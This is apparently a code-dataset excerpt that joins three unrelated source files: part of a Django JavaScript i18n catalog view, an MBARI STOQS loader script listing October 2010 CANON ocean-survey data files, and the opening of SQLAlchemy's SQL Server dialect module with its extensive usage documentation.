if isinstance(k, six.string_types):
catalog[k] = v
elif isinstance(k, tuple):
msgid = k[0]
cnt = k[1]
maxcnts[msgid] = max(cnt, maxcnts.get(msgid, 0))
pdict.setdefault(msgid, {})[cnt] = v
else:
raise TypeError(k)
for k, v in pdict.items():
catalog[k] = [v.get(i, '') for i in range(maxcnts[msgid] + 1)]
return catalog, plural
def null_javascript_catalog(request, domain=None, packages=None):
"""
Returns "identity" versions of the JavaScript i18n functions -- i.e.,
versions that don't actually do anything.
"""
return render_javascript_catalog()
def javascript_catalog(request, domain='djangojs', packages=None):
"""
Returns the selected language catalog as a javascript library.
Receives the list of packages to check for translations in the
packages parameter either from an infodict or as a +-delimited
string from the request. Default is 'django.conf'.
Additionally you can override the gettext domain for this view,
but usually you don't want to do that, as JavaScript messages
go to the djangojs domain. But this might be needed if you
deliver your JavaScript source from Django templates.
"""
locale = to_locale(get_language())
if request.GET and 'language' in request.GET:
if check_for_language(request.GET['language']):
locale = to_locale(request.GET['language'])
if packages is None:
packages = ['django.conf']
if isinstance(packages, six.string_types):
packages = packages.split('+')
catalog, plural = get_javascript_catalog(locale, domain, packages)
return render_javascript_catalog(catalog, plural)
| bsd-3-clause |
josephmfaulkner/stoqs | stoqs/loaders/CANON/loadCANON_october2010.py | 1 | 5132 | #!/usr/bin/env python
__author__ = 'Mike McCann'
__copyright__ = '2011'
__license__ = 'GPL v3'
__contact__ = 'mccann at mbari.org'
__doc__ = '''
Master loader for all CANON activities in October 2010
Mike McCann
MBARI 22 April 2012
@var __date__: Date of last svn commit
@undocumented: __doc__ parser
@status: production
@license: GPL
'''
import os
import sys
parentDir = os.path.join(os.path.dirname(__file__), "../")
sys.path.insert(0, parentDir) # So that CANON is found
from CANON import CANONLoader
cl = CANONLoader('stoqs_october2010', 'CANON - October 2010',
description = 'Bloomex observing campaign in Monterey Bay',
x3dTerrains = {
'http://dods.mbari.org/terrain/x3d/Monterey25_10x/Monterey25_10x_scene.x3d': {
'position': '-2822317.31255 -4438600.53640 3786150.85474',
'orientation': '0.89575 -0.31076 -0.31791 1.63772',
'centerOfRotation': '-2711557.9403829873 -4331414.329506527 3801353.4691465236',
'VerticalExaggeration': '10',
'speed': '.1',
}
},
grdTerrain = os.path.join(parentDir, 'Monterey25.grd')
)
# Dorado data - 2 second gridded
cl.dorado_base = 'http://dods.mbari.org/opendap/data/auvctd/surveys/2010/netcdf/'
cl.dorado_files = [ 'Dorado389_2010_277_01_277_01_decim.nc',
'Dorado389_2010_278_01_278_01_decim.nc',
'Dorado389_2010_279_02_279_02_decim.nc',
'Dorado389_2010_280_01_280_01_decim.nc',
'Dorado389_2010_284_00_284_00_decim.nc',
'Dorado389_2010_285_00_285_00_decim.nc',
'Dorado389_2010_286_01_286_02_decim.nc',
'Dorado389_2010_287_00_287_00_decim.nc',
'Dorado389_2010_291_00_291_00_decim.nc',
'Dorado389_2010_292_01_292_01_decim.nc',
'Dorado389_2010_293_00_293_00_decim.nc',
'Dorado389_2010_294_01_294_01_decim.nc',
'Dorado389_2010_298_01_298_01_decim.nc',
'Dorado389_2010_299_00_299_00_decim.nc',
'Dorado389_2010_300_00_300_00_decim.nc',
'Dorado389_2010_301_00_301_00_decim.nc',
]
cl.dorado_parms = [ 'temperature', 'oxygen', 'nitrate', 'bbp420', 'bbp700',
'fl700_uncorr', 'salinity', 'biolume',
'sepCountList', 'mepCountList',
]
# These are full resolution (_d_) data files with Chl only from the first Tethys data used for CANON
# Offical long-term archive location is: http://dods.mbari.org/opendap/data/lrauv/tethys/missionlogs/2010/
cl.tethys_base = 'http://dods.mbari.org/opendap/data/auvctd/tethys/2010/netcdf/'
cl.tethys_files = [ '20101018T143308_Chl_.nc',
'20101019T001815_Chl_.nc',
'20101019T155117_Chl_.nc',
'20101020T113957_Chl_.nc',
]
cl.tethys_parms = ['mass_concentration_of_chlorophyll_in_sea_water']
# Realtime shore.nc files - not a DODS server...
cl.tethys_r_base = 'http://aosn.mbari.org/sbdlogs/tethys/2010/201010/'
cl.tethys_r_files = [ '20101018T143308/shore.nc',
'20101019T001815/shore.nc',
'20101019T155117/shore.nv',
'20101020T113957/shore.nc',
]
cl.tethys_r_parms = ['mass_concentration_of_chlorophyll_in_sea_water']
cl.martin_base = 'http://odss.mbari.org/thredds/dodsC/jhm_underway'
cl.martin_files = [ '27710_jhmudas_v1.nc',
'27810_jhmudas_v1.nc',
'27910_jhmudas_v1.nc',
'28010_jhmudas_v1.nc',
'28110_jhmudas_v1.nc',
'28410_jhmudas_v1.nc',
'28510_jhmudas_v1.nc',
'28610_jhmudas_v1.nc',
'28710_jhmudas_v1.nc',
'29010_jhmudas_v1.nc',
'29110_jhmudas_v1.nc',
'29210_jhmudas_v1.nc',
'29310_jhmudas_v1.nc',
'29410_jhmudas_v1.nc',
'29810_jhmudas_v1.nc',
'29910_jhmudas_v1.nc',
'30010_jhmudas_v1.nc',
'30110_jhmudas_v1.nc',
]
cl.martin_parms = [ 'conductivity', 'temperature', 'salinity', 'fluorescence', 'turbidity']
# Execute the load
cl.process_command_line()
if cl.args.test:
cl.loadDorado(stride=100)
cl.loadTethys(stride=1000)
cl.loadMartin(stride=1000)
elif cl.args.optimal_stride:
cl.loadDorado(stride=2)
cl.loadTethys(stride=2)
cl.loadMartin(stride=1)
else:
cl.stride = cl.args.stride
cl.loadDorado()
cl.loadTethys()
cl.loadMartin()
# Add any X3D Terrain information specified in the constructor to the database - must be done after a load is executed
cl.addTerrainResources()
print "All Done."
| gpl-3.0 |
franekp/millandict | ankidict/thirdparty/sqlalchemy/dialects/mssql/base.py | 2 | 71442 | # mssql/base.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: mssql
:name: Microsoft SQL Server
Auto Increment Behavior
-----------------------
SQL Server provides so-called "auto incrementing" behavior using the
``IDENTITY`` construct, which can be placed on an integer primary key.
SQLAlchemy considers ``IDENTITY`` within its default "autoincrement" behavior,
described at :paramref:`.Column.autoincrement`; this means
that by default, the first integer primary key column in a :class:`.Table`
will be considered to be the identity column and will generate DDL as such::
from sqlalchemy import Table, MetaData, Column, Integer
m = MetaData()
t = Table('t', m,
Column('id', Integer, primary_key=True),
Column('x', Integer))
m.create_all(engine)
The above example will generate DDL as:
.. sourcecode:: sql
CREATE TABLE t (
id INTEGER NOT NULL IDENTITY(1,1),
x INTEGER NULL,
PRIMARY KEY (id)
)
For the case where this default generation of ``IDENTITY`` is not desired,
specify ``autoincrement=False`` on all integer primary key columns::
m = MetaData()
t = Table('t', m,
Column('id', Integer, primary_key=True, autoincrement=False),
Column('x', Integer))
m.create_all(engine)
.. note::
An INSERT statement which refers to an explicit value for such
a column is prohibited by SQL Server, however SQLAlchemy will detect this
and modify the ``IDENTITY_INSERT`` flag accordingly at statement execution
time. As this is not a high performing process, care should be taken to
set the ``autoincrement`` flag appropriately for columns that will not
actually require IDENTITY behavior.
Controlling "Start" and "Increment"
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Specific control over the parameters of the ``IDENTITY`` value is supported
using the :class:`.schema.Sequence` object. While this object normally
represents an explicit "sequence" for supporting backends, on SQL Server it is
re-purposed to specify behavior regarding the identity column, including
support of the "start" and "increment" values::
from sqlalchemy import Table, Integer, Sequence, Column
Table('test', metadata,
Column('id', Integer,
Sequence('blah', start=100, increment=10),
primary_key=True),
Column('name', String(20))
).create(some_engine)
would yield:
.. sourcecode:: sql
CREATE TABLE test (
id INTEGER NOT NULL IDENTITY(100,10) PRIMARY KEY,
name VARCHAR(20) NULL,
)
Note that the ``start`` and ``increment`` values for sequences are
optional and will default to 1,1.
INSERT behavior
^^^^^^^^^^^^^^^^
Handling of the ``IDENTITY`` column at INSERT time involves two key
techniques. The most common is being able to fetch the "last inserted value"
for a given ``IDENTITY`` column, a process which SQLAlchemy performs
implicitly in many cases, most importantly within the ORM.
The process for fetching this value has several variants:
* In the vast majority of cases, RETURNING is used in conjunction with INSERT
statements on SQL Server in order to get newly generated primary key values:
.. sourcecode:: sql
INSERT INTO t (x) OUTPUT inserted.id VALUES (?)
* When RETURNING is not available or has been disabled via
``implicit_returning=False``, either the ``scope_identity()`` function or
the ``@@identity`` variable is used; behavior varies by backend:
* when using PyODBC, the phrase ``; select scope_identity()`` will be
appended to the end of the INSERT statement; a second result set will be
fetched in order to receive the value. Given a table as::
t = Table('t', m, Column('id', Integer, primary_key=True),
Column('x', Integer),
implicit_returning=False)
an INSERT will look like:
.. sourcecode:: sql
INSERT INTO t (x) VALUES (?); select scope_identity()
* Other dialects such as pymssql will call upon
``SELECT scope_identity() AS lastrowid`` subsequent to an INSERT
statement. If the flag ``use_scope_identity=False`` is passed to
:func:`.create_engine`, the statement ``SELECT @@identity AS lastrowid``
is used instead.
A table that contains an ``IDENTITY`` column will prohibit an INSERT statement
that refers to the identity column explicitly. The SQLAlchemy dialect will
detect when an INSERT construct, created using a core :func:`.insert`
construct (not a plain string SQL), refers to the identity column, and
in this case will emit ``SET IDENTITY_INSERT ON`` prior to the insert
statement proceeding, and ``SET IDENTITY_INSERT OFF`` subsequent to the
execution. Given this example::
m = MetaData()
t = Table('t', m, Column('id', Integer, primary_key=True),
Column('x', Integer))
m.create_all(engine)
engine.execute(t.insert(), {'id': 1, 'x':1}, {'id':2, 'x':2})
The above column will be created with IDENTITY, however the INSERT statement
we emit is specifying explicit values. In the echo output we can see
how SQLAlchemy handles this:
.. sourcecode:: sql
CREATE TABLE t (
id INTEGER NOT NULL IDENTITY(1,1),
x INTEGER NULL,
PRIMARY KEY (id)
)
COMMIT
SET IDENTITY_INSERT t ON
INSERT INTO t (id, x) VALUES (?, ?)
((1, 1), (2, 2))
SET IDENTITY_INSERT t OFF
COMMIT
This
is an auxiliary use case suitable for testing and bulk insert scenarios.
MAX on VARCHAR / NVARCHAR
-------------------------
SQL Server supports the special string "MAX" within the
:class:`.sqltypes.VARCHAR` and :class:`.sqltypes.NVARCHAR` datatypes,
to indicate "maximum length possible". The dialect currently handles this as
a length of "None" in the base type, rather than supplying a
dialect-specific version of these types, so that a base type
specified such as ``VARCHAR(None)`` can assume "unlengthed" behavior on
more than one backend without using dialect-specific types.
To build a SQL Server VARCHAR or NVARCHAR with MAX length, use None::
my_table = Table(
'my_table', metadata,
Column('my_data', VARCHAR(None)),
Column('my_n_data', NVARCHAR(None))
)
Collation Support
-----------------
Character collations are supported by the base string types,
specified by the string argument "collation"::
from sqlalchemy import VARCHAR
Column('login', VARCHAR(32, collation='Latin1_General_CI_AS'))
When such a column is associated with a :class:`.Table`, the
CREATE TABLE statement for this column will yield::
login VARCHAR(32) COLLATE Latin1_General_CI_AS NULL
.. versionadded:: 0.8 Character collations are now part of the base string
types.
LIMIT/OFFSET Support
--------------------
MSSQL has no support for the LIMIT or OFFSET keywords. LIMIT is
supported directly through the ``TOP`` Transact SQL keyword::
select.limit
will yield::
SELECT TOP n
If using SQL Server 2005 or above, LIMIT with OFFSET
support is available through the ``ROW_NUMBER OVER`` construct.
For versions below 2005, LIMIT with OFFSET usage will fail.
.. _mssql_isolation_level:
Transaction Isolation Level
---------------------------
All SQL Server dialects support setting of transaction isolation level
both via a dialect-specific parameter
:paramref:`.create_engine.isolation_level`
accepted by :func:`.create_engine`,
as well as the :paramref:`.Connection.execution_options.isolation_level`
argument as passed to
:meth:`.Connection.execution_options`. This feature works by issuing the
command ``SET TRANSACTION ISOLATION LEVEL <level>`` for
each new connection.
To set isolation level using :func:`.create_engine`::
engine = create_engine(
"mssql+pyodbc://scott:tiger@ms_2008",
isolation_level="REPEATABLE READ"
)
To set using per-connection execution options::
connection = engine.connect()
connection = connection.execution_options(
isolation_level="READ COMMITTED"
)
Valid values for ``isolation_level`` include:
* ``READ COMMITTED``
* ``READ UNCOMMITTED``
* ``REPEATABLE READ``
* ``SERIALIZABLE``
* ``SNAPSHOT`` - specific to SQL Server
.. versionadded:: 1.1 support for isolation level setting on Microsoft
SQL Server.
Nullability
-----------
MSSQL has support for three levels of column nullability. The default
nullability allows nulls and is explicit in the CREATE TABLE
construct::
name VARCHAR(20) NULL
If ``nullable=None`` is specified then no specification is made. In
other words the database's configured default is used. This will
render::
name VARCHAR(20)
If ``nullable`` is ``True`` or ``False`` then the column will be
``NULL`` or ``NOT NULL`` respectively.
Date / Time Handling
--------------------
DATE and TIME are supported. Bind parameters are converted
to datetime.datetime() objects as required by most MSSQL drivers,
and results are processed from strings if needed.
The DATE and TIME types are not available for MSSQL 2005 and
previous - if a server version below 2008 is detected, DDL
for these types will be issued as DATETIME.
.. _mssql_large_type_deprecation:
Large Text/Binary Type Deprecation
----------------------------------
Per `SQL Server 2012/2014 Documentation <http://technet.microsoft.com/en-us/library/ms187993.aspx>`_,
the ``NTEXT``, ``TEXT`` and ``IMAGE`` datatypes are to be removed from SQL Server
in a future release. SQLAlchemy normally relates these types to the
:class:`.UnicodeText`, :class:`.Text` and :class:`.LargeBinary` datatypes.
In order to accommodate this change, a new flag ``deprecate_large_types``
is added to the dialect, which will be automatically set based on detection
of the server version in use, if not otherwise set by the user. The
behavior of this flag is as follows:
* When this flag is ``True``, the :class:`.UnicodeText`, :class:`.Text` and
:class:`.LargeBinary` datatypes, when used to render DDL, will render the
types ``NVARCHAR(max)``, ``VARCHAR(max)``, and ``VARBINARY(max)``,
respectively. This is a new behavior as of the addition of this flag.
* When this flag is ``False``, the :class:`.UnicodeText`, :class:`.Text` and
:class:`.LargeBinary` datatypes, when used to render DDL, will render the
types ``NTEXT``, ``TEXT``, and ``IMAGE``,
respectively. This is the long-standing behavior of these types.
* The flag begins with the value ``None``, before a database connection is
established. If the dialect is used to render DDL without the flag being
set, it is interpreted the same as ``False``.
* On first connection, the dialect detects if SQL Server version 2012 or greater
is in use; if the flag is still at ``None``, it sets it to ``True`` or
``False`` based on whether 2012 or greater is detected.
* The flag can be set to either ``True`` or ``False`` when the dialect
is created, typically via :func:`.create_engine`::
eng = create_engine("mssql+pymssql://user:pass@host/db",
deprecate_large_types=True)
* Complete control over whether the "old" or "new" types are rendered is
available in all SQLAlchemy versions by using the UPPERCASE type objects
instead: :class:`.NVARCHAR`, :class:`.VARCHAR`, :class:`.types.VARBINARY`,
:class:`.TEXT`, :class:`.mssql.NTEXT`, :class:`.mssql.IMAGE` will always remain
fixed and always output exactly that type.
.. versionadded:: 1.0.0
.. _legacy_schema_rendering:
Legacy Schema Mode
------------------
Very old versions of the MSSQL dialect introduced the behavior such that a
schema-qualified table would be auto-aliased when used in a
SELECT statement; given a table::
account_table = Table(
'account', metadata,
Column('id', Integer, primary_key=True),
Column('info', String(100)),
schema="customer_schema"
)
this legacy mode of rendering would assume that "customer_schema.account"
would not be accepted by all parts of the SQL statement, as illustrated
below::
>>> eng = create_engine("mssql+pymssql://mydsn", legacy_schema_aliasing=True)
>>> print(account_table.select().compile(eng))
SELECT account_1.id, account_1.info
FROM customer_schema.account AS account_1
This mode of behavior is now off by default, as it appears to have served
no purpose; however in the case that legacy applications rely upon it,
it is available using the ``legacy_schema_aliasing`` argument to
:func:`.create_engine` as illustrated above.
.. versionchanged:: 1.1 the ``legacy_schema_aliasing`` flag introduced
in version 1.0.5 to allow disabling of legacy mode for schemas now
defaults to False.
.. _mssql_indexes:
Clustered Index Support
-----------------------
The MSSQL dialect supports clustered indexes (and primary keys) via the
``mssql_clustered`` option. This option is available to :class:`.Index`,
:class:`.UniqueConstraint`. and :class:`.PrimaryKeyConstraint`.
To generate a clustered index::
Index("my_index", table.c.x, mssql_clustered=True)
which renders the index as ``CREATE CLUSTERED INDEX my_index ON table (x)``.
To generate a clustered primary key use::
Table('my_table', metadata,
Column('x', ...),
Column('y', ...),
PrimaryKeyConstraint("x", "y", mssql_clustered=True))
which will render the table, for example, as::
CREATE TABLE my_table (x INTEGER NOT NULL, y INTEGER NOT NULL,
PRIMARY KEY CLUSTERED (x, y))
Similarly, we can generate a clustered unique constraint using::
Table('my_table', metadata,
Column('x', ...),
Column('y', ...),
PrimaryKeyConstraint("x"),
UniqueConstraint("y", mssql_clustered=True),
)
To explicitly request a non-clustered primary key (for example, when
a separate clustered index is desired), use::
Table('my_table', metadata,
Column('x', ...),
Column('y', ...),
PrimaryKeyConstraint("x", "y", mssql_clustered=False))
which will render the table, for example, as::
CREATE TABLE my_table (x INTEGER NOT NULL, y INTEGER NOT NULL,
PRIMARY KEY NONCLUSTERED (x, y))
.. versionchanged:: 1.1 the ``mssql_clustered`` option now defaults
to None, rather than False. ``mssql_clustered=False`` now explicitly
renders the NONCLUSTERED clause, whereas None omits the CLUSTERED
clause entirely, allowing SQL Server defaults to take effect.
MSSQL-Specific Index Options
-----------------------------
In addition to clustering, the MSSQL dialect supports other special options
for :class:`.Index`.
INCLUDE
^^^^^^^
The ``mssql_include`` option renders INCLUDE(colname) for the given string
names::
Index("my_index", table.c.x, mssql_include=['y'])
would render the index as ``CREATE INDEX my_index ON table (x) INCLUDE (y)``
.. versionadded:: 0.8
Index ordering
^^^^^^^^^^^^^^
Index ordering is available via functional expressions, such as::
Index("my_index", table.c.x.desc())
would render the index as ``CREATE INDEX my_index ON table (x DESC)``
.. versionadded:: 0.8
.. seealso::
:ref:`schema_indexes_functional`
Compatibility Levels
--------------------
MSSQL supports the notion of setting compatibility levels at the
database level. This allows, for instance, to run a database that
is compatible with SQL2000 while running on a SQL2005 database
server. ``server_version_info`` will always return the database
server version information (in this case SQL2005) and not the
compatibility level information. Because of this, if running under
a backwards compatibility mode SQAlchemy may attempt to use T-SQL
statements that are unable to be parsed by the database server.
Triggers
--------
SQLAlchemy by default uses OUTPUT INSERTED to get at newly
generated primary key values via IDENTITY columns or other
server side defaults. MS-SQL does not
allow the usage of OUTPUT INSERTED on tables that have triggers.
To disable the usage of OUTPUT INSERTED on a per-table basis,
specify ``implicit_returning=False`` for each :class:`.Table`
which has triggers::
Table('mytable', metadata,
Column('id', Integer, primary_key=True),
# ...,
implicit_returning=False
)
Declarative form::
class MyClass(Base):
# ...
__table_args__ = {'implicit_returning':False}
This option can also be specified engine-wide using the
``implicit_returning=False`` argument on :func:`.create_engine`.
.. _mssql_rowcount_versioning:
Rowcount Support / ORM Versioning
---------------------------------
The SQL Server drivers have very limited ability to return the number
of rows updated from an UPDATE or DELETE statement. In particular, the
pymssql driver has no support, whereas the pyodbc driver can only return
this value under certain conditions.
In particular, updated rowcount is not available when OUTPUT INSERTED
is used. This impacts the SQLAlchemy ORM's versioning feature when
server-side versioning schemes are used. When
using pyodbc, the "implicit_returning" flag needs to be set to false
for any ORM mapped class that uses a version_id column in conjunction with
a server-side version generator::
class MyTable(Base):
__tablename__ = 'mytable'
id = Column(Integer, primary_key=True)
stuff = Column(String(10))
timestamp = Column(TIMESTAMP(), default=text('DEFAULT'))
__mapper_args__ = {
'version_id_col': timestamp,
'version_id_generator': False,
}
__table_args__ = {
'implicit_returning': False
}
Without the implicit_returning flag above, the UPDATE statement will
use ``OUTPUT inserted.timestamp`` and the rowcount will be returned as
-1, causing the versioning logic to fail.
Enabling Snapshot Isolation
---------------------------
Not necessarily specific to SQLAlchemy, SQL Server has a default transaction
isolation mode that locks entire tables, and causes even mildly concurrent
applications to have long held locks and frequent deadlocks.
Enabling snapshot isolation for the database as a whole is recommended
for modern levels of concurrency support. This is accomplished via the
following ALTER DATABASE commands executed at the SQL prompt::
ALTER DATABASE MyDatabase SET ALLOW_SNAPSHOT_ISOLATION ON
ALTER DATABASE MyDatabase SET READ_COMMITTED_SNAPSHOT ON
Background on SQL Server snapshot isolation is available at
http://msdn.microsoft.com/en-us/library/ms175095.aspx.
Known Issues
------------
* No support for more than one ``IDENTITY`` column per table
* reflection of indexes does not work with versions older than
SQL Server 2005
"""
import datetime
import operator
import re
from ... import sql, schema as sa_schema, exc, util
from ...sql import compiler, expression, util as sql_util
from ... import engine
from ...engine import reflection, default
from ... import types as sqltypes
from ...types import INTEGER, BIGINT, SMALLINT, DECIMAL, NUMERIC, \
FLOAT, TIMESTAMP, DATETIME, DATE, BINARY,\
TEXT, VARCHAR, NVARCHAR, CHAR, NCHAR
from ...util import update_wrapper
from . import information_schema as ischema
# http://sqlserverbuilds.blogspot.com/
MS_2012_VERSION = (11,)
MS_2008_VERSION = (10,)
MS_2005_VERSION = (9,)
MS_2000_VERSION = (8,)
RESERVED_WORDS = set(
['add', 'all', 'alter', 'and', 'any', 'as', 'asc', 'authorization',
'backup', 'begin', 'between', 'break', 'browse', 'bulk', 'by', 'cascade',
'case', 'check', 'checkpoint', 'close', 'clustered', 'coalesce',
'collate', 'column', 'commit', 'compute', 'constraint', 'contains',
'containstable', 'continue', 'convert', 'create', 'cross', 'current',
'current_date', 'current_time', 'current_timestamp', 'current_user',
'cursor', 'database', 'dbcc', 'deallocate', 'declare', 'default',
'delete', 'deny', 'desc', 'disk', 'distinct', 'distributed', 'double',
'drop', 'dump', 'else', 'end', 'errlvl', 'escape', 'except', 'exec',
'execute', 'exists', 'exit', 'external', 'fetch', 'file', 'fillfactor',
'for', 'foreign', 'freetext', 'freetexttable', 'from', 'full',
'function', 'goto', 'grant', 'group', 'having', 'holdlock', 'identity',
'identity_insert', 'identitycol', 'if', 'in', 'index', 'inner', 'insert',
'intersect', 'into', 'is', 'join', 'key', 'kill', 'left', 'like',
'lineno', 'load', 'merge', 'national', 'nocheck', 'nonclustered', 'not',
'null', 'nullif', 'of', 'off', 'offsets', 'on', 'open', 'opendatasource',
'openquery', 'openrowset', 'openxml', 'option', 'or', 'order', 'outer',
'over', 'percent', 'pivot', 'plan', 'precision', 'primary', 'print',
'proc', 'procedure', 'public', 'raiserror', 'read', 'readtext',
'reconfigure', 'references', 'replication', 'restore', 'restrict',
'return', 'revert', 'revoke', 'right', 'rollback', 'rowcount',
'rowguidcol', 'rule', 'save', 'schema', 'securityaudit', 'select',
'session_user', 'set', 'setuser', 'shutdown', 'some', 'statistics',
'system_user', 'table', 'tablesample', 'textsize', 'then', 'to', 'top',
'tran', 'transaction', 'trigger', 'truncate', 'tsequal', 'union',
'unique', 'unpivot', 'update', 'updatetext', 'use', 'user', 'values',
'varying', 'view', 'waitfor', 'when', 'where', 'while', 'with',
'writetext',
])
class REAL(sqltypes.REAL):
__visit_name__ = 'REAL'
def __init__(self, **kw):
# REAL is a synonym for FLOAT(24) on SQL server
kw['precision'] = 24
super(REAL, self).__init__(**kw)
class TINYINT(sqltypes.Integer):
__visit_name__ = 'TINYINT'
# MSSQL DATE/TIME types have varied behavior, sometimes returning
# strings. MSDate/TIME check for everything, and always
# filter bind parameters into datetime objects (required by pyodbc,
# not sure about other dialects).
class _MSDate(sqltypes.Date):
def bind_processor(self, dialect):
def process(value):
if type(value) == datetime.date:
return datetime.datetime(value.year, value.month, value.day)
else:
return value
return process
_reg = re.compile(r"(\d+)-(\d+)-(\d+)")
def result_processor(self, dialect, coltype):
def process(value):
if isinstance(value, datetime.datetime):
return value.date()
elif isinstance(value, util.string_types):
m = self._reg.match(value)
if not m:
raise ValueError(
"could not parse %r as a date value" % (value, ))
return datetime.date(*[
int(x or 0)
for x in m.groups()
])
else:
return value
return process
class TIME(sqltypes.TIME):
def __init__(self, precision=None, **kwargs):
self.precision = precision
super(TIME, self).__init__()
__zero_date = datetime.date(1900, 1, 1)
def bind_processor(self, dialect):
def process(value):
if isinstance(value, datetime.datetime):
value = datetime.datetime.combine(
self.__zero_date, value.time())
elif isinstance(value, datetime.time):
value = datetime.datetime.combine(self.__zero_date, value)
return value
return process
_reg = re.compile(r"(\d+):(\d+):(\d+)(?:\.(\d{0,6}))?")
def result_processor(self, dialect, coltype):
def process(value):
if isinstance(value, datetime.datetime):
return value.time()
elif isinstance(value, util.string_types):
m = self._reg.match(value)
if not m:
raise ValueError(
"could not parse %r as a time value" % (value, ))
return datetime.time(*[
int(x or 0)
for x in m.groups()])
else:
return value
return process
_MSTime = TIME
class _DateTimeBase(object):
def bind_processor(self, dialect):
def process(value):
if type(value) == datetime.date:
return datetime.datetime(value.year, value.month, value.day)
else:
return value
return process
class _MSDateTime(_DateTimeBase, sqltypes.DateTime):
pass
class SMALLDATETIME(_DateTimeBase, sqltypes.DateTime):
__visit_name__ = 'SMALLDATETIME'
class DATETIME2(_DateTimeBase, sqltypes.DateTime):
__visit_name__ = 'DATETIME2'
def __init__(self, precision=None, **kw):
super(DATETIME2, self).__init__(**kw)
self.precision = precision
# TODO: is this not an Interval ?
class DATETIMEOFFSET(sqltypes.TypeEngine):
__visit_name__ = 'DATETIMEOFFSET'
def __init__(self, precision=None, **kwargs):
self.precision = precision
class _StringType(object):
"""Base for MSSQL string types."""
def __init__(self, collation=None):
super(_StringType, self).__init__(collation=collation)
class NTEXT(sqltypes.UnicodeText):
"""MSSQL NTEXT type, for variable-length unicode text up to 2^30
characters."""
__visit_name__ = 'NTEXT'
class VARBINARY(sqltypes.VARBINARY, sqltypes.LargeBinary):
"""The MSSQL VARBINARY type.
This type extends both :class:`.types.VARBINARY` and
:class:`.types.LargeBinary`. In "deprecate_large_types" mode,
the :class:`.types.LargeBinary` type will produce ``VARBINARY(max)``
on SQL Server.
.. versionadded:: 1.0.0
.. seealso::
:ref:`mssql_large_type_deprecation`
"""
__visit_name__ = 'VARBINARY'
class IMAGE(sqltypes.LargeBinary):
__visit_name__ = 'IMAGE'
class BIT(sqltypes.TypeEngine):
__visit_name__ = 'BIT'
class MONEY(sqltypes.TypeEngine):
__visit_name__ = 'MONEY'
class SMALLMONEY(sqltypes.TypeEngine):
__visit_name__ = 'SMALLMONEY'
class UNIQUEIDENTIFIER(sqltypes.TypeEngine):
__visit_name__ = "UNIQUEIDENTIFIER"
class SQL_VARIANT(sqltypes.TypeEngine):
__visit_name__ = 'SQL_VARIANT'
# old names.
MSDateTime = _MSDateTime
MSDate = _MSDate
MSReal = REAL
MSTinyInteger = TINYINT
MSTime = TIME
MSSmallDateTime = SMALLDATETIME
MSDateTime2 = DATETIME2
MSDateTimeOffset = DATETIMEOFFSET
MSText = TEXT
MSNText = NTEXT
MSString = VARCHAR
MSNVarchar = NVARCHAR
MSChar = CHAR
MSNChar = NCHAR
MSBinary = BINARY
MSVarBinary = VARBINARY
MSImage = IMAGE
MSBit = BIT
MSMoney = MONEY
MSSmallMoney = SMALLMONEY
MSUniqueIdentifier = UNIQUEIDENTIFIER
MSVariant = SQL_VARIANT
ischema_names = {
'int': INTEGER,
'bigint': BIGINT,
'smallint': SMALLINT,
'tinyint': TINYINT,
'varchar': VARCHAR,
'nvarchar': NVARCHAR,
'char': CHAR,
'nchar': NCHAR,
'text': TEXT,
'ntext': NTEXT,
'decimal': DECIMAL,
'numeric': NUMERIC,
'float': FLOAT,
'datetime': DATETIME,
'datetime2': DATETIME2,
'datetimeoffset': DATETIMEOFFSET,
'date': DATE,
'time': TIME,
'smalldatetime': SMALLDATETIME,
'binary': BINARY,
'varbinary': VARBINARY,
'bit': BIT,
'real': REAL,
'image': IMAGE,
'timestamp': TIMESTAMP,
'money': MONEY,
'smallmoney': SMALLMONEY,
'uniqueidentifier': UNIQUEIDENTIFIER,
'sql_variant': SQL_VARIANT,
}
class MSTypeCompiler(compiler.GenericTypeCompiler):
def _extend(self, spec, type_, length=None):
"""Extend a string-type declaration with standard SQL
COLLATE annotations.
"""
if getattr(type_, 'collation', None):
collation = 'COLLATE %s' % type_.collation
else:
collation = None
if not length:
length = type_.length
if length:
spec = spec + "(%s)" % length
return ' '.join([c for c in (spec, collation)
if c is not None])
def visit_FLOAT(self, type_, **kw):
precision = getattr(type_, 'precision', None)
if precision is None:
return "FLOAT"
else:
return "FLOAT(%(precision)s)" % {'precision': precision}
def visit_TINYINT(self, type_, **kw):
return "TINYINT"
def visit_DATETIMEOFFSET(self, type_, **kw):
if type_.precision is not None:
return "DATETIMEOFFSET(%s)" % type_.precision
else:
return "DATETIMEOFFSET"
def visit_TIME(self, type_, **kw):
precision = getattr(type_, 'precision', None)
if precision is not None:
return "TIME(%s)" % precision
else:
return "TIME"
def visit_DATETIME2(self, type_, **kw):
precision = getattr(type_, 'precision', None)
if precision is not None:
return "DATETIME2(%s)" % precision
else:
return "DATETIME2"
def visit_SMALLDATETIME(self, type_, **kw):
return "SMALLDATETIME"
def visit_unicode(self, type_, **kw):
return self.visit_NVARCHAR(type_, **kw)
def visit_text(self, type_, **kw):
if self.dialect.deprecate_large_types:
return self.visit_VARCHAR(type_, **kw)
else:
return self.visit_TEXT(type_, **kw)
def visit_unicode_text(self, type_, **kw):
if self.dialect.deprecate_large_types:
return self.visit_NVARCHAR(type_, **kw)
else:
return self.visit_NTEXT(type_, **kw)
def visit_NTEXT(self, type_, **kw):
return self._extend("NTEXT", type_)
def visit_TEXT(self, type_, **kw):
return self._extend("TEXT", type_)
def visit_VARCHAR(self, type_, **kw):
return self._extend("VARCHAR", type_, length=type_.length or 'max')
def visit_CHAR(self, type_, **kw):
return self._extend("CHAR", type_)
def visit_NCHAR(self, type_, **kw):
return self._extend("NCHAR", type_)
def visit_NVARCHAR(self, type_, **kw):
return self._extend("NVARCHAR", type_, length=type_.length or 'max')
def visit_date(self, type_, **kw):
if self.dialect.server_version_info < MS_2008_VERSION:
return self.visit_DATETIME(type_, **kw)
else:
return self.visit_DATE(type_, **kw)
def visit_time(self, type_, **kw):
if self.dialect.server_version_info < MS_2008_VERSION:
return self.visit_DATETIME(type_, **kw)
else:
return self.visit_TIME(type_, **kw)
def visit_large_binary(self, type_, **kw):
if self.dialect.deprecate_large_types:
return self.visit_VARBINARY(type_, **kw)
else:
return self.visit_IMAGE(type_, **kw)
def visit_IMAGE(self, type_, **kw):
return "IMAGE"
def visit_VARBINARY(self, type_, **kw):
